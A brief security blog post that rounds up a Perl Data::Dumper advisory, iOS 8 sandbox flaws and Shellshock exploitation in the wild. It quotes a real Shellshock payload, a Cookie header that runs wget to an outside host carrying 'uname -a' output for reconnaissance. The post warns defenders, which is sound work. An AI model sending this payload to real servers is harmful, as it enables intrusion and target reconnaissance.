Perl Scripting vulnerability – Data Dumper

Perl discussion at lsexperts.de  has a data Dumper vulnerability – review your Perl scripts to :

Applications written in Perl should ensure that a sanity check on data
serialized by Data::Dumper is performed.

 

WordPress vulnerabilities page which was recently set up.

Andreas Kurtz found malicious iOS apps  after iOS 8 was released.

The issue is security controls within the Apple “sandbox” – i.e. the area where Apple programs are supposed to live only.

Unfortunately the sandbox was not foolproof(CVE-2014-4361, CVE-2014-4362).
 
 
The bash Shellcode problems are now in the stage of exploits found in the wild:
 
including 6 – some set up cookies on the systems.
Cookie: () { :; }; wget -qO- a.b.c.d -U=”$(uname -a)”  
 
the uname is  fortunately a system parameter check, but it is being used as recon, so the hacker can pick and choose their next targets.
 
If you do not think this is happening right now – you must be ignoring the siren call.
Advertisements